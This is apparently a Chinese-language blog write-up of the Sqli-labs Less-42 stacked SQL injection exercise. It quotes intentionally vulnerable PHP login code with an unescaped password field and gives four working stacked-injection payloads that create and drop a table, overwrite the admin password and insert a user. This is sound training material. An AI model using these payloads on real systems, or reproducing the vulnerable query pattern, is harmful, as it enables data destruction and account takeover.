zoukankan      html  css  js  c++  java
  • Sqli-labs Less-42 堆叠注入

    pass_change.php关键代码

    $username= $_SESSION["username"];
    $curr_pass= mysql_real_escape_string($_POST['current_password']);
    $pass= mysql_real_escape_string($_POST['password']);
    $re_pass= mysql_real_escape_string($_POST['re_password']);
    $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

    pdate更新数据后,经过mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化。在select调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。

    本关从login.php源代码中分析可知:

    $username = mysqli_real_escape_string($con1,$_POST["login_user"]);
    $password = $_POST["login_password"];
    $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

    Password变量在post过程中,没有通过mysql_real_escape_string()函数的处理。因此在登录的时候密码选项我们可以进行attack。

    利用stacked injection,我们可以对数据库进行各种操作。

    登录用户名随意

    (1)利用c';create table me like users#作为登录密码,创建一个表。

    (2)利用c';drop table me#作为登录密码,删除该表。

    (3)利用c';update users set password='hello' where username='admin' #作为登录密码,修改admin密码。

    (4)利用c';insert into users(id,username,password) values('42','less42','hello')#作为登录密码,插入一个用户。

    等等。

  • 相关阅读:
    SQL SQL 连接 JOIN 例解。(左连接,右连接,全连接,内连接,交叉连接,自连接)[转]
    ADO.NET 1.基础(SqlCommand\ExecuteScalar\ExecuteReader\sqlDataAdapter)
    SQL 14.子查询
    winform 基础
    SQL – 12.索引 + 13.join
    判断是否为数字
    SQL 17.存储过程
    SQL 16.事务
    SQL 15.变量和流程控制
    SQL 18.触发器
  • 原文地址:https://www.cnblogs.com/zhengna/p/12661926.html
Copyright © 2011-2022 走看看